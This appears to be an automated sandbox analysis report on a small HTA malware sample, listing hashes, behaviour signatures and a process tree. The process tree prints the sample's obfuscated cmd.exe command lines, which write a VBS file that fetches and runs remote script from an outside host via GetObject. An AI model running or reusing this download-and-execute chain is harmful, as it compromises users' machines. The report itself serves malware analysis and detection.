Analysis
- max time kernel: 119s
- max time network: 120s
- platform: windows7_x64
- resource: win7-20240704-en
- resource tags: arch:x64 arch:x86 image:win7-20240704-en locale:en-us os:windows7-x64 system
- submitted: 29/08/2024, 09:23
Static task: static1
Behavioral task: behavioral1
- Sample: test.hta
- Resource: win7-20240704-en
Behavioral task: behavioral2
- Sample: test.hta
- Resource: win10v2004-20240802-en
General
- Target: test.hta
- Size: 147B
- MD5: 0144b746edf817419d3fe42b0c50fe92
- SHA1: f469ffccdf5213f4be17608d2b44d738a604b807
- SHA256: 7e360e8b091aab014189554faeef805a3ae2ffd11124fd4ffdd827abf3be7306
- SHA512: da5447e4ea8313b7cfdc5bb7c3dffe8c21cf2ae5b07c653f0abd125415647f71330c84502f5a0eafdbd7b1a465d0de103ed9598e9183d6587f08299d0df683a2
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
flow  pid   Process
5     2144  mshta.exe
7     2144  mshta.exe
9     2144  mshta.exe
11    2300  WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                          Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  taskkill.exe
Kills process with taskkill 1 IoCs
pid   Process
1448  taskkill.exe
Modifies Internet Explorer settings
description  ioc                                                                                                     Process
Key created  \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
Modifies system certificate store
description       ioc                                                                                                                            Process
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob omitted)  mshta.exe
Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8         mshta.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs
description              pid   Process
Token: SeDebugPrivilege  1448  taskkill.exe
Suspicious use of WriteProcessMemory 40 IoCs
description                        pid   Process      procid_target
PID 2144 wrote to memory of 3028   2144  mshta.exe    32
PID 2144 wrote to memory of 3028   2144  mshta.exe    32
PID 2144 wrote to memory of 3028   2144  mshta.exe    32
PID 2144 wrote to memory of 3028   2144  mshta.exe    32
PID 2144 wrote to memory of 2016   2144  mshta.exe    34
PID 2144 wrote to memory of 2016   2144  mshta.exe    34
PID 2144 wrote to memory of 2016   2144  mshta.exe    34
PID 2144 wrote to memory of 2016   2144  mshta.exe    34
PID 2016 wrote to memory of 2768   2016  cmd.exe      36
PID 2016 wrote to memory of 2768   2016  cmd.exe      36
PID 2016 wrote to memory of 2768   2016  cmd.exe      36
PID 2016 wrote to memory of 2768   2016  cmd.exe      36
PID 2016 wrote to memory of 2892   2016  cmd.exe      37
PID 2016 wrote to memory of 2892   2016  cmd.exe      37
PID 2016 wrote to memory of 2892   2016  cmd.exe      37
PID 2016 wrote to memory of 2892   2016  cmd.exe      37
PID 2016 wrote to memory of 2820   2016  cmd.exe      38
PID 2016 wrote to memory of 2820   2016  cmd.exe      38
PID 2016 wrote to memory of 2820   2016  cmd.exe      38
PID 2016 wrote to memory of 2820   2016  cmd.exe      38
PID 2016 wrote to memory of 328    2016  cmd.exe      39
PID 2016 wrote to memory of 328    2016  cmd.exe      39
PID 2016 wrote to memory of 328    2016  cmd.exe      39
PID 2016 wrote to memory of 328    2016  cmd.exe      39
PID 2144 wrote to memory of 2772   2144  mshta.exe    40
PID 2144 wrote to memory of 2772   2144  mshta.exe    40
PID 2144 wrote to memory of 2772   2144  mshta.exe    40
PID 2144 wrote to memory of 2772   2144  mshta.exe    40
PID 2144 wrote to memory of 2616   2144  mshta.exe    42
PID 2144 wrote to memory of 2616   2144  mshta.exe    42
PID 2144 wrote to memory of 2616   2144  mshta.exe    42
PID 2144 wrote to memory of 2616   2144  mshta.exe    42
PID 2616 wrote to memory of 2300   2616  cmd.exe      44
PID 2616 wrote to memory of 2300   2616  cmd.exe      44
PID 2616 wrote to memory of 2300   2616  cmd.exe      44
PID 2616 wrote to memory of 2300   2616  cmd.exe      44
PID 2300 wrote to memory of 1448   2300  WScript.exe  45
PID 2300 wrote to memory of 1448   2300  WScript.exe  45
PID 2300 wrote to memory of 1448   2300  WScript.exe  45
PID 2300 wrote to memory of 1448   2300  WScript.exe  45
Processes
- C:\Windows\SysWOW64\mshta.exe (depth 1)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\test.hta"
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID: 2144
  - C:\Windows\SysWOW64\cmd.exe (depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /V/D/c "echo WLzi1c22="ri">C:\Users\Public\vvcH43.vbs&&echo IZ4u450="tp">>C:\Users\Public\vvcH43.vbs&&echo hMJQ6C71=".":OduoBTg12="sC" ^& WLzi1c22 ^& "pt:ht" ^& IZ4u450 ^& "s://">>C:\Users\Public\vvcH43.vbs"
    - System Location Discovery: System Language Discovery
    PID: 3028
  - C:\Windows\SysWOW64\cmd.exe (depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /V/D/c echo|set /p=^"OduoBTg12^=OduoBTg12 ^& ^"43"+hMJQ6C71+"244"+hMJQ6C71+"109"+hMJQ6C71+"208"+hMJQ6C71+"host"+hMJQ6C71+"secureserver"+hMJQ6C71+"net/g1^":GetO^">>C:\Users\Public\\vvcH43.vbs&echo|set /p=^"bject(^">>C:\Users\Public\\vvcH43.vbs
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 2016
    - C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo"
      - System Location Discovery: System Language Discovery
      PID: 2768
    - C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" set /p="OduoBTg12=OduoBTg12 & "43"+hMJQ6C71+"244"+hMJQ6C71+"109"+hMJQ6C71+"208"+hMJQ6C71+"host"+hMJQ6C71+"secureserver"+hMJQ6C71+"net/g1":GetO" 1>>C:\Users\Public\\vvcH43.vbs"
      - System Location Discovery: System Language Discovery
      PID: 2892
    - C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo"
      - System Location Discovery: System Language Discovery
      PID: 2820
    - C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" set /p="bject(" 1>>C:\Users\Public\\vvcH43.vbs"
      - System Location Discovery: System Language Discovery
      PID: 328
  - C:\Windows\SysWOW64\cmd.exe (depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /V/D/c "echo _>>C:\Users\Public\\vvcH43.vbs&&echo OduoBTg12)>>C:\Users\Public\\vvcH43.vbs"
    - System Location Discovery: System Language Discovery
    PID: 2772
  - C:\Windows\SysWOW64\cmd.exe (depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\\vvcH43.vbs
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 2616
    - C:\Windows\SysWOW64\WScript.exe (depth 3)
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Public\vvcH43.vbs"
      - Blocklisted process makes network request
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 2300
      - C:\Windows\SysWOW64\taskkill.exe (depth 4)
        Command line: "C:\Windows\System32\taskkill.exe" /F /IM mshta.exe
        - System Location Discovery: System Language Discovery
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
        PID: 1448
Network
MITRE ATT&CK Enterprise v15
Downloads